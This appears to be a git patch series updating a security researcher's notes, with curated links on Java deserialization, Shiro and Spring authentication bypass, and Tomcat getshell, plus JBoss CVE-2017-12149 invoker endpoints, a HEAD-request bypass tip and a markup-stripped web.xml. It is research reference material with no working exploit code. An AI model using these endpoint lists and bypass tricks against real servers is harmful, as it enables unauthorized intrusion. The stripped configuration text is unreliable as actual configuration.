From bafaa63dcc47e2e2bae562eb6d8982b70e0efc3a Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Sun, 12 Jun 2022 11:00:08 +0800
Subject: [PATCH 001/257] Update Readme.md
---
"java\346\227\245\345\270\270/Readme.md" | 1 +
1 file changed, 1 insertion(+)
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md"
index 1639ea4..486304a 100644
--- "a/java\346\227\245\345\270\270/Readme.md"
+++ "b/java\346\227\245\345\270\270/Readme.md"
@@ -134,3 +134,4 @@
+ 2022/05/30 [Shiro反序列化漏洞笔记五(对抗篇)](http://changxia3.com/2022/05/09/Shiro%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E7%AC%94%E8%AE%B0%E4%BA%94%EF%BC%88%E5%AF%B9%E6%8A%97%E7%AF%87%EF%BC%89/#0x1-%E5%89%8D%E8%A8%80) **里面很多trick 的bypass**
+ 2022/06/05 [精简JRE,打造无依赖的Java-ShellCode-Loader](https://mp.weixin.qq.com/s?__biz=Mzg2MTc1NDAxMA==&mid=2247483848&idx=1&sn=03ea03031d7f6f19c7848f3bb60267a3&chksm=ce13063df9648f2bfdc5dd39b230ba400af7fad8f9b87b292646e862b2c41bd3db2c34341443&mpshare=1&scene=23&srcid=0605Twg54SwL9UVJVuW0U9dE&sharer_sharetime=1654430144972&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **感觉不错 减少了执行java的成本**
+ 2022/06/06 [CVE-2020-7961 Liferay Portal 复现分析](https://www.programminghunter.com/article/5340663689/)
++ 2022/06/12 [Identity Security Authentication Vulnerability](http://noahblog.360.cn/an-quan-ren-zheng-xiang-guan-lou-dong-wa-jue/) **权限绕过认证非常不错**
From e7f45d6c353408c289bb56cf3d797671e13e524f Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Sun, 12 Jun 2022 11:16:08 +0800
Subject: [PATCH 002/257] Update Readme.md
---
"java\346\227\245\345\270\270/Readme.md" | 1 +
1 file changed, 1 insertion(+)
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md"
index 486304a..94af294 100644
--- "a/java\346\227\245\345\270\270/Readme.md"
+++ "b/java\346\227\245\345\270\270/Readme.md"
@@ -135,3 +135,4 @@
+ 2022/06/05 [精简JRE,打造无依赖的Java-ShellCode-Loader](https://mp.weixin.qq.com/s?__biz=Mzg2MTc1NDAxMA==&mid=2247483848&idx=1&sn=03ea03031d7f6f19c7848f3bb60267a3&chksm=ce13063df9648f2bfdc5dd39b230ba400af7fad8f9b87b292646e862b2c41bd3db2c34341443&mpshare=1&scene=23&srcid=0605Twg54SwL9UVJVuW0U9dE&sharer_sharetime=1654430144972&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **感觉不错 减少了执行java的成本**
+ 2022/06/06 [CVE-2020-7961 Liferay Portal 复现分析](https://www.programminghunter.com/article/5340663689/)
+ 2022/06/12 [Identity Security Authentication Vulnerability](http://noahblog.360.cn/an-quan-ren-zheng-xiang-guan-lou-dong-wa-jue/) **权限绕过认证非常不错**
++ 2022/06/12 [Blackhat 2021 议题详细分析—— FastJson 反序列化漏洞及在区块链应用中的渗透利用](http://noahblog.360.cn/blackhat-2021yi-ti-xiang-xi-fen-xi-fastjsonfan-xu-lie-hua-lou-dong-ji-zai-qu-kuai-lian-ying-yong-zhong-de-shen-tou-li-yong-2/) **扩大了利用**
From 9f89c57ca7a377204b5b736b4c6303498e1c2f1a Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Sat, 18 Jun 2022 23:10:07 +0800
Subject: [PATCH 003/257] Update Readme.md
---
"java\346\227\245\345\270\270/Readme.md" | 1 +
1 file changed, 1 insertion(+)
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md"
index 94af294..b8f6a30 100644
--- "a/java\346\227\245\345\270\270/Readme.md"
+++ "b/java\346\227\245\345\270\270/Readme.md"
@@ -136,3 +136,4 @@
+ 2022/06/06 [CVE-2020-7961 Liferay Portal 复现分析](https://www.programminghunter.com/article/5340663689/)
+ 2022/06/12 [Identity Security Authentication Vulnerability](http://noahblog.360.cn/an-quan-ren-zheng-xiang-guan-lou-dong-wa-jue/) **权限绕过认证非常不错**
+ 2022/06/12 [Blackhat 2021 议题详细分析—— FastJson 反序列化漏洞及在区块链应用中的渗透利用](http://noahblog.360.cn/blackhat-2021yi-ti-xiang-xi-fen-xi-fastjsonfan-xu-lie-hua-lou-dong-ji-zai-qu-kuai-lian-ying-yong-zhong-de-shen-tou-li-yong-2/) **扩大了利用**
++ 2022/06/18 [Java中的任意文件上传技巧](https://pyn3rd.github.io/2022/05/07/Arbitrary-File-Upload-Tricks-In-Java/) **bypass waf 文件上传**
From 3b199f945fb869f8cb3e7df63ea176b660697c4a Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Wed, 22 Jun 2022 17:27:24 +0800
Subject: [PATCH 004/257] Update Readme.md
---
"java\346\227\245\345\270\270/Readme.md" | 1 +
1 file changed, 1 insertion(+)
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md"
index b8f6a30..e06ff9a 100644
--- "a/java\346\227\245\345\270\270/Readme.md"
+++ "b/java\346\227\245\345\270\270/Readme.md"
@@ -137,3 +137,4 @@
+ 2022/06/12 [Identity Security Authentication Vulnerability](http://noahblog.360.cn/an-quan-ren-zheng-xiang-guan-lou-dong-wa-jue/) **权限绕过认证非常不错**
+ 2022/06/12 [Blackhat 2021 议题详细分析—— FastJson 反序列化漏洞及在区块链应用中的渗透利用](http://noahblog.360.cn/blackhat-2021yi-ti-xiang-xi-fen-xi-fastjsonfan-xu-lie-hua-lou-dong-ji-zai-qu-kuai-lian-ying-yong-zhong-de-shen-tou-li-yong-2/) **扩大了利用**
+ 2022/06/18 [Java中的任意文件上传技巧](https://pyn3rd.github.io/2022/05/07/Arbitrary-File-Upload-Tricks-In-Java/) **bypass waf 文件上传**
++ 2022/06/22 [关于Tomcat中的三个Context的理解](https://yzddmr6.com/posts/tomcat-context/)
From fd59cc19dcba105a9124ece08537db56131669b5 Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Fri, 24 Jun 2022 10:14:40 +0800
Subject: [PATCH 005/257] Update Readme.md
---
"java\346\250\241\346\235\277\346\263\250\345\205\245/Readme.md" | 1 +
1 file changed, 1 insertion(+)
diff --git "a/java\346\250\241\346\235\277\346\263\250\345\205\245/Readme.md" "b/java\346\250\241\346\235\277\346\263\250\345\205\245/Readme.md"
index d69975f..722fd77 100644
--- "a/java\346\250\241\346\235\277\346\263\250\345\205\245/Readme.md"
+++ "b/java\346\250\241\346\235\277\346\263\250\345\205\245/Readme.md"
@@ -2,6 +2,7 @@
>https://github.com/lufeirider/BypassShell/blob/master/JAVA/JAVA.md
+>https://gosecure.github.io/template-injection-workshop/#0
+ [FreeMarker模板注入](FreeMarker) 后缀名.ftl
From 83bf9845180d808bcd8fc77b2e57169d66f014e1 Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Fri, 24 Jun 2022 12:58:08 +0800
Subject: [PATCH 006/257] Update Readme.md
---
"java\346\227\245\345\270\270/Readme.md" | 1 +
1 file changed, 1 insertion(+)
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md"
index e06ff9a..f55dbba 100644
--- "a/java\346\227\245\345\270\270/Readme.md"
+++ "b/java\346\227\245\345\270\270/Readme.md"
@@ -138,3 +138,4 @@
+ 2022/06/12 [Blackhat 2021 议题详细分析—— FastJson 反序列化漏洞及在区块链应用中的渗透利用](http://noahblog.360.cn/blackhat-2021yi-ti-xiang-xi-fen-xi-fastjsonfan-xu-lie-hua-lou-dong-ji-zai-qu-kuai-lian-ying-yong-zhong-de-shen-tou-li-yong-2/) **扩大了利用**
+ 2022/06/18 [Java中的任意文件上传技巧](https://pyn3rd.github.io/2022/05/07/Arbitrary-File-Upload-Tricks-In-Java/) **bypass waf 文件上传**
+ 2022/06/22 [关于Tomcat中的三个Context的理解](https://yzddmr6.com/posts/tomcat-context/)
++ 2022/06/24 [利用tomcat自动部署机制getshell](https://novysodope.github.io/2022/06/01/82/) **tocmat 文件上传war目录穿越到webapps目录 getshell**
From 122d66a5e11cfd65e3746928fdc6b60d57d774e7 Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Fri, 24 Jun 2022 13:12:45 +0800
Subject: [PATCH 007/257] Update Readme.md
---
"java\346\227\245\345\270\270/Readme.md" | 1 +
1 file changed, 1 insertion(+)
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md"
index f55dbba..a778fc9 100644
--- "a/java\346\227\245\345\270\270/Readme.md"
+++ "b/java\346\227\245\345\270\270/Readme.md"
@@ -139,3 +139,4 @@
+ 2022/06/18 [Java中的任意文件上传技巧](https://pyn3rd.github.io/2022/05/07/Arbitrary-File-Upload-Tricks-In-Java/) **bypass waf 文件上传**
+ 2022/06/22 [关于Tomcat中的三个Context的理解](https://yzddmr6.com/posts/tomcat-context/)
+ 2022/06/24 [利用tomcat自动部署机制getshell](https://novysodope.github.io/2022/06/01/82/) **tocmat 文件上传war目录穿越到webapps目录 getshell**
++ 2022/06/24 [记一次Spring Devtools反序列化利用](https://xz.aliyun.com/t/8349) **非常不错而且居然是2020年的知识**
From 19f099d56bd1f458e15a6177638cfb8677a09011 Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Sat, 25 Jun 2022 22:02:51 +0800
Subject: [PATCH 008/257] Update Readme.md
---
"java\346\227\245\345\270\270/Readme.md" | 1 +
1 file changed, 1 insertion(+)
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md"
index a778fc9..176579a 100644
--- "a/java\346\227\245\345\270\270/Readme.md"
+++ "b/java\346\227\245\345\270\270/Readme.md"
@@ -140,3 +140,4 @@
+ 2022/06/22 [关于Tomcat中的三个Context的理解](https://yzddmr6.com/posts/tomcat-context/)
+ 2022/06/24 [利用tomcat自动部署机制getshell](https://novysodope.github.io/2022/06/01/82/) **tocmat 文件上传war目录穿越到webapps目录 getshell**
+ 2022/06/24 [记一次Spring Devtools反序列化利用](https://xz.aliyun.com/t/8349) **非常不错而且居然是2020年的知识**
++ 2022/06/25 [CVE-2022-22978 Spring Security RegexRequestMatcher 认证绕过及转发流程分析](https://xz.aliyun.com/t/11473) **对认证过后spring分发器的分析不错,自己之前就遇到了404的问题**
From f65caaf7b8980cac7f91d764ebd37ac0de0397b1 Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Sat, 25 Jun 2022 22:30:37 +0800
Subject: [PATCH 009/257] Update Readme.md
---
"java\346\227\245\345\270\270/Readme.md" | 1 +
1 file changed, 1 insertion(+)
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md"
index 176579a..7707a95 100644
--- "a/java\346\227\245\345\270\270/Readme.md"
+++ "b/java\346\227\245\345\270\270/Readme.md"
@@ -141,3 +141,4 @@
+ 2022/06/24 [利用tomcat自动部署机制getshell](https://novysodope.github.io/2022/06/01/82/) **tocmat 文件上传war目录穿越到webapps目录 getshell**
+ 2022/06/24 [记一次Spring Devtools反序列化利用](https://xz.aliyun.com/t/8349) **非常不错而且居然是2020年的知识**
+ 2022/06/25 [CVE-2022-22978 Spring Security RegexRequestMatcher 认证绕过及转发流程分析](https://xz.aliyun.com/t/11473) **对认证过后spring分发器的分析不错,自己之前就遇到了404的问题**
++ 2022/06/25 [【新手入门系列】 一步一步教你漏洞挖掘之如何在半黑盒模式下挖掘RCE漏洞](https://mp.weixin.qq.com/s/nusGsstudrQt2dwZxHXKgg) **客服端漏洞挖掘。。**
From 57e516fe9bfaf3b6741fe68f6e936fb8b4a8f4e0 Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Sat, 25 Jun 2022 22:44:18 +0800
Subject: [PATCH 010/257] Update Readme.md
---
SnakeYaml/Readme.md | 4 +++-
1 file changed, 3 insertions(+), 1 deletion(-)
diff --git a/SnakeYaml/Readme.md b/SnakeYaml/Readme.md
index ec4c550..cf6bec6 100644
--- a/SnakeYaml/Readme.md
+++ b/SnakeYaml/Readme.md
@@ -1,7 +1,9 @@
# snakeyaml
## 不出网利用
->通过fastjson写文件如何本地加载rce
+>通过写文件然后本地加载rce
+
+//todo 写一个工具 去完成
https://xz.aliyun.com/t/10655
From 7b70f617cbdd71ebd25336b2cdeb6d1b22c736ea Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Mon, 27 Jun 2022 22:28:08 +0800
Subject: [PATCH 011/257] Update Readme.md
---
"java\346\227\245\345\270\270/Readme.md" | 1 +
1 file changed, 1 insertion(+)
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md"
index 7707a95..8fae1f4 100644
--- "a/java\346\227\245\345\270\270/Readme.md"
+++ "b/java\346\227\245\345\270\270/Readme.md"
@@ -142,3 +142,4 @@
+ 2022/06/24 [记一次Spring Devtools反序列化利用](https://xz.aliyun.com/t/8349) **非常不错而且居然是2020年的知识**
+ 2022/06/25 [CVE-2022-22978 Spring Security RegexRequestMatcher 认证绕过及转发流程分析](https://xz.aliyun.com/t/11473) **对认证过后spring分发器的分析不错,自己之前就遇到了404的问题**
+ 2022/06/25 [【新手入门系列】 一步一步教你漏洞挖掘之如何在半黑盒模式下挖掘RCE漏洞](https://mp.weixin.qq.com/s/nusGsstudrQt2dwZxHXKgg) **客服端漏洞挖掘。。**
++ 2022/06/27 [Beanshell未授权利用简析](https://www.kitsch.live/2021/09/22/beanshell%e6%9c%aa%e6%8e%88%e6%9d%83%e5%88%a9%e7%94%a8%e7%ae%80%e6%9e%90/) **其他绕过方法**
From 8b296e1c18e4399452d2dc598206df74779402dc Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Mon, 27 Jun 2022 23:12:36 +0800
Subject: [PATCH 012/257] Update Readme.md
---
"java\346\227\245\345\270\270/Readme.md" | 1 +
1 file changed, 1 insertion(+)
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md"
index 8fae1f4..a159900 100644
--- "a/java\346\227\245\345\270\270/Readme.md"
+++ "b/java\346\227\245\345\270\270/Readme.md"
@@ -143,3 +143,4 @@
+ 2022/06/25 [CVE-2022-22978 Spring Security RegexRequestMatcher 认证绕过及转发流程分析](https://xz.aliyun.com/t/11473) **对认证过后spring分发器的分析不错,自己之前就遇到了404的问题**
+ 2022/06/25 [【新手入门系列】 一步一步教你漏洞挖掘之如何在半黑盒模式下挖掘RCE漏洞](https://mp.weixin.qq.com/s/nusGsstudrQt2dwZxHXKgg) **客服端漏洞挖掘。。**
+ 2022/06/27 [Beanshell未授权利用简析](https://www.kitsch.live/2021/09/22/beanshell%e6%9c%aa%e6%8e%88%e6%9d%83%e5%88%a9%e7%94%a8%e7%ae%80%e6%9e%90/) **其他绕过方法**
++ 2022/06/27 [漏洞检测的那些事儿](https://paper.seebug.org/9/) **漏洞检测相关的知识**
From 12bfda258a9263bc6405c25f850297639ef3771b Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Wed, 29 Jun 2022 08:53:45 +0800
Subject: [PATCH 013/257] Update Readme.md
---
.../Readme.md" | 3 +++
1 file changed, 3 insertions(+)
diff --git "a/Shiro/Shiro\346\235\203\351\231\220\347\273\225\350\277\207/Readme.md" "b/Shiro/Shiro\346\235\203\351\231\220\347\273\225\350\277\207/Readme.md"
index 90be438..6073000 100644
--- "a/Shiro/Shiro\346\235\203\351\231\220\347\273\225\350\277\207/Readme.md"
+++ "b/Shiro/Shiro\346\235\203\351\231\220\347\273\225\350\277\207/Readme.md"
@@ -155,7 +155,10 @@ pom.xml 中版本修改为 1.7.0 或及以下即可
/admin/%20
```
+## CVE-2022-32532
+[CVE-2022-32532](https://github.com/4ra1n/CVE-2022-32532)
+原理参考[CVE-2022-22978 Spring Security RegexRequestMatcher 认证绕过及转发流程分析](https://xz.aliyun.com/t/11473)
>参考:
>
From 0375cf9efffa189c8c02f2057f4d31bb3cb497dc Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Thu, 30 Jun 2022 09:57:35 +0800
Subject: [PATCH 014/257] Update Readme.md
---
"java\346\227\245\345\270\270/Readme.md" | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md"
index a159900..b8c200b 100644
--- "a/java\346\227\245\345\270\270/Readme.md"
+++ "b/java\346\227\245\345\270\270/Readme.md"
@@ -47,7 +47,7 @@
+ 2021/10/26 [Hessian 原理分析](https://www.cnblogs.com/shangxiaofei/p/4222170.html) 大概就是以二进制数组传输的rpc,存在反序列化问题。
+ 2021/10/26 [XXL-JOB Hessian2反序列化漏洞](https://www.mi1k7ea.com/2021/04/22/XXL-JOB-Hessian2%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/)
+ 2021/10/30 [Mojarra JSF ViewState 反序列化漏洞](https://blog.csdn.net/xuandao_ahfengren/article/details/113135364)
-+ 2021/11/02 [关于Java 中 XXE 的利用限制探究](https://www.freebuf.com/articles/web/284225.html) **使用http外带数据不能有换行,使用ftp可以解决,但是ftp在java 8u131修复了这个漏洞 CVE-2017-3533**
++ 2021/11/02 [关于Java 中 XXE 的利用限制探究](https://www.freebuf.com/articles/web/284225.html) **使用http外带数据不能有换行,使用ftp可以解决,但是ftp在java 8u131修复了这个漏洞 CVE-2017-3533** [代码修复](https://github.com/openjdk/jdk8u-dev/commit/644ddd7722bea502f029378c22d51b6eb66f8c25)
+ 2021/11/02 [Adobe ColdFusion 反序列化漏洞(CVE-2017-3066)](https://github.com/vulhub/vulhub/blob/master/coldfusion/CVE-2017-3066/README.zh-cn.md) 暴露接口反序列化。。。
+ 2021/11/03 [浅谈Liferay Portal JSON Web Service未授权反序列化远程代码执行漏洞](https://xz.aliyun.com/t/7485)
+ 2021/11/03 [H2 Database Console 未授权访问](https://github.com/vulhub/vulhub/blob/master/h2database/h2-console-unacc/README.zh-cn.md)
From e4ce9bdc0217e92f8c14105f3ee8066c2fdb121b Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Sat, 2 Jul 2022 16:11:38 +0800
Subject: [PATCH 015/257] Update Readme.md
---
"java\346\227\245\345\270\270/Readme.md" | 1 +
1 file changed, 1 insertion(+)
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md"
index b8c200b..b82a05e 100644
--- "a/java\346\227\245\345\270\270/Readme.md"
+++ "b/java\346\227\245\345\270\270/Readme.md"
@@ -144,3 +144,4 @@
+ 2022/06/25 [【新手入门系列】 一步一步教你漏洞挖掘之如何在半黑盒模式下挖掘RCE漏洞](https://mp.weixin.qq.com/s/nusGsstudrQt2dwZxHXKgg) **客服端漏洞挖掘。。**
+ 2022/06/27 [Beanshell未授权利用简析](https://www.kitsch.live/2021/09/22/beanshell%e6%9c%aa%e6%8e%88%e6%9d%83%e5%88%a9%e7%94%a8%e7%ae%80%e6%9e%90/) **其他绕过方法**
+ 2022/06/27 [漏洞检测的那些事儿](https://paper.seebug.org/9/) **漏洞检测相关的知识**
++ 2022/07/02 [记一次无文件Webshell攻击分析](https://changxia3.com/2021/07/13/%E8%AE%B0%E4%B8%80%E6%AC%A1%E6%97%A0%E6%96%87%E4%BB%B6Webshell%E6%94%BB%E5%87%BB%E5%88%86%E6%9E%90/)
From 521cf5dd53eeeca310a7ab8f239a25d9e0433991 Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Sun, 3 Jul 2022 20:21:01 +0800
Subject: [PATCH 016/257] Update Readme.md
---
"java\346\227\245\345\270\270/Readme.md" | 1 +
1 file changed, 1 insertion(+)
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md"
index b82a05e..415bb41 100644
--- "a/java\346\227\245\345\270\270/Readme.md"
+++ "b/java\346\227\245\345\270\270/Readme.md"
@@ -145,3 +145,4 @@
+ 2022/06/27 [Beanshell未授权利用简析](https://www.kitsch.live/2021/09/22/beanshell%e6%9c%aa%e6%8e%88%e6%9d%83%e5%88%a9%e7%94%a8%e7%ae%80%e6%9e%90/) **其他绕过方法**
+ 2022/06/27 [漏洞检测的那些事儿](https://paper.seebug.org/9/) **漏洞检测相关的知识**
+ 2022/07/02 [记一次无文件Webshell攻击分析](https://changxia3.com/2021/07/13/%E8%AE%B0%E4%B8%80%E6%AC%A1%E6%97%A0%E6%96%87%E4%BB%B6Webshell%E6%94%BB%E5%87%BB%E5%88%86%E6%9E%90/)
++ 2022/07/03 [第16篇:Weblogic 2019-2729反序列化漏洞绕防护拿权限的实战过程](https://mp.weixin.qq.com/s?__biz=MzkzMjI1NjI3Ng==&mid=2247484303&idx=1&sn=58cbb4d7f63b9276bb89eeac286d174c&chksm=c25fccf4f52845e241256c2f425003b73b6061b3d1964dcd4a184a2cda1b4d8761098227e6de&mpshare=1&scene=23&srcid=0703XRThsRmunAKy5fSIYQKh&sharer_sharetime=1656786411917&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **其中的获取weblogic路径不错**
From 5658e488a7fe1486912002ab287817ee32e70eca Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Sat, 9 Jul 2022 13:24:24 +0800
Subject: [PATCH 017/257] Update README.md
---
Jboss/README.md | 13 ++++++++++++-
1 file changed, 12 insertions(+), 1 deletion(-)
diff --git a/Jboss/README.md b/Jboss/README.md
index 029922c..840d1a5 100644
--- a/Jboss/README.md
+++ b/Jboss/README.md
@@ -1,4 +1,4 @@
-## jboss介绍:
+# jboss介绍:
JBoss 是一个基于J2EE的[开放源代码](https://baike.baidu.com/item/开放源代码/114160)的[应用服务器](https://baike.baidu.com/item/应用服务器/4971773)。 JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用。JBoss是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3的规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。
@@ -6,3 +6,14 @@ JBoss 是一个基于J2EE的[开放源代码](https://baike.baidu.com/item/开
所以自己想写一个综合利用的工具。。。
+ [JBOSS CVE-2017-12149 WAF绕过之旅](https://www.yulegeyu.com/2021/03/05/JBOSS-CVE-2017-12149-WAF%E7%BB%95%E8%BF%87%E4%B9%8B%E6%97%85/)
+
+## CVE-2017-12149
+
+**endpoint**
+```
+/invoker/readonly
+/invoker/EJBInvokerServlet
+/invoker/JMXInvokerServlet
+/invoker/readonly/JMXInvokerServlet
+/invoker/restricted/JMXInvokerServlet
+```
From 5c7898aae22bcfeae2dd48ce1b62f57808317143 Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Sat, 9 Jul 2022 13:30:14 +0800
Subject: [PATCH 018/257] Update README.md
---
Jboss/README.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/Jboss/README.md b/Jboss/README.md
index 840d1a5..05bb751 100644
--- a/Jboss/README.md
+++ b/Jboss/README.md
@@ -8,7 +8,7 @@ JBoss 是一个基于J2EE的[开放源代码](https://baike.baidu.com/item/开
+ [JBOSS CVE-2017-12149 WAF绕过之旅](https://www.yulegeyu.com/2021/03/05/JBOSS-CVE-2017-12149-WAF%E7%BB%95%E8%BF%87%E4%B9%8B%E6%97%85/)
## CVE-2017-12149
-
+bypass 请求方式是HEAD
**endpoint**
```
/invoker/readonly
From 9bedef620fa3a13cf65efd526a50fcdfd6030dbf Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Sat, 9 Jul 2022 13:30:28 +0800
Subject: [PATCH 019/257] Update README.md
---
Jboss/README.md | 1 +
1 file changed, 1 insertion(+)
diff --git a/Jboss/README.md b/Jboss/README.md
index 05bb751..10fa4ff 100644
--- a/Jboss/README.md
+++ b/Jboss/README.md
@@ -9,6 +9,7 @@ JBoss 是一个基于J2EE的[开放源代码](https://baike.baidu.com/item/开
## CVE-2017-12149
bypass 请求方式是HEAD
+
**endpoint**
```
/invoker/readonly
From 90e4dc33aec17ad352ad094d770eb7d92803452c Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Sat, 9 Jul 2022 13:59:33 +0800
Subject: [PATCH 020/257] Update README.md
---
Jboss/README.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/Jboss/README.md b/Jboss/README.md
index 10fa4ff..aa2b85d 100644
--- a/Jboss/README.md
+++ b/Jboss/README.md
@@ -12,7 +12,7 @@ bypass 请求方式是HEAD
**endpoint**
```
-/invoker/readonly
+/invoker/readonly 是一个filter 请求方法随便并且url后面可以加其他的
/invoker/EJBInvokerServlet
/invoker/JMXInvokerServlet
/invoker/readonly/JMXInvokerServlet
From 566fae7b414b0391b9c6ab5e6ca3ecc0eedc3549 Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Sat, 9 Jul 2022 14:03:06 +0800
Subject: [PATCH 021/257] Update README.md
---
Jboss/README.md | 490 +++++++++++++++++++++++++++++++++++++++++++++++-
1 file changed, 489 insertions(+), 1 deletion(-)
diff --git a/Jboss/README.md b/Jboss/README.md
index aa2b85d..6e56210 100644
--- a/Jboss/README.md
+++ b/Jboss/README.md
@@ -7,7 +7,7 @@ JBoss 是一个基于J2EE的[开放源代码](https://baike.baidu.com/item/开
+ [JBOSS CVE-2017-12149 WAF绕过之旅](https://www.yulegeyu.com/2021/03/05/JBOSS-CVE-2017-12149-WAF%E7%BB%95%E8%BF%87%E4%B9%8B%E6%97%85/)
-## CVE-2017-12149
+## 反序列化漏洞
bypass 请求方式是HEAD
**endpoint**
@@ -18,3 +18,491 @@ bypass 请求方式是HEAD
/invoker/readonly/JMXInvokerServlet
/invoker/restricted/JMXInvokerServlet
```
+http-invoker.sar 组件的问题
+
+web.xml
+
+```xml
+
+
+
+
+
+
+ ReadOnlyAccessFilter
+ org.jboss.invocation.http.servlet.ReadOnlyAccessFilter
+
+ readOnlyContext
+ readonly
+ The top level JNDI context the filter will enforce
+ read-only access on. If specified only Context.lookup operations
+ will be allowed on this context. Another other operations or lookups
+ on any other context will fail. Do not associate this filter with the
+ JMXInvokerServlets if you want unrestricted access.
+
+
+
+ invokerName
+ jboss:service=NamingBeanImpl
+ The JMX ObjectName of the naming service mbean
+
+
+
+
+
+ ReadOnlyAccessFilter
+ /readonly/*
+
+
+
+
+ EJBInvokerServlet
+ The EJBInvokerServlet receives posts containing serlized
+ MarshalledInvocation objects that are routed to the EJB invoker given by
+ the invokerName init-param. The return content is a serialized
+ MarshalledValue containg the return value of the inovocation, or any
+ exception that may have been thrown.
+
+ org.jboss.invocation.http.servlet.InvokerServlet
+
+ invokerName
+ jboss:service=invoker,type=http
+ The RMI/HTTP EJB compatible invoker
+
+ 1
+
+
+ JMXInvokerServlet
+ The JMXInvokerServlet receives posts containing serlized
+ MarshalledInvocation objects that are routed to the invoker given by
+ the the MBean whose object name hash is specified by the
+ invocation.getObjectName() value. The return content is a serialized
+ MarshalledValue containg the return value of the inovocation, or any
+ exception that may have been thrown.
+
+ org.jboss.invocation.http.servlet.InvokerServlet
+ 1
+
+
+
+ JNDIFactory
+ A servlet that exposes the JBoss JNDI Naming service stub
+ through http. The return content is a serialized
+ MarshalledValue containg the org.jnp.interfaces.Naming stub. This
+ configuration handles requests for the standard JNDI naming service.
+
+ org.jboss.invocation.http.servlet.NamingFactoryServlet
+
+ namingProxyMBean
+ jboss:service=invoker,type=http,target=Naming
+
+
+ proxyAttribute
+ Proxy
+
+ 2
+
+
+
+ ReadOnlyJNDIFactory
+ A servlet that exposes the JBoss JNDI Naming service stub
+ through http, but only for a single read-only context. The return content
+ is a serialized MarshalledValue containg the org.jnp.interfaces.Naming
+ stub.
+
+ org.jboss.invocation.http.servlet.NamingFactoryServlet
+
+ namingProxyMBean
+ jboss:service=invoker,type=http,target=Naming,readonly=true
+
+
+ proxyAttribute
+ Proxy
+
+ 2
+
+
+
+
+ JNDIFactory
+ /JNDIFactory/*
+
+
+
+ ReadOnlyJNDIFactory
+ /ReadOnlyJNDIFactory/*
+
+
+ EJBInvokerServlet
+ /EJBInvokerServlet/*
+
+
+ JMXInvokerServlet
+ /JMXInvokerServlet/*
+
+
+
+ JMXInvokerServlet
+ /readonly/JMXInvokerServlet/*
+
+
+
+
+ JNDIFactory
+ /restricted/JNDIFactory/*
+
+
+ JMXInvokerServlet
+ /restricted/JMXInvokerServlet/*
+
+
+
+
+
+ HttpInvokers
+ An example security config that only allows users with the
+ role HttpInvoker to access the HTTP invoker servlets
+
+ /restricted/*
+ GET
+ POST
+
+
+ HttpInvoker
+
+
+
+ BASIC
+ JBoss HTTP Invoker
+
+
+
+ HttpInvoker
+
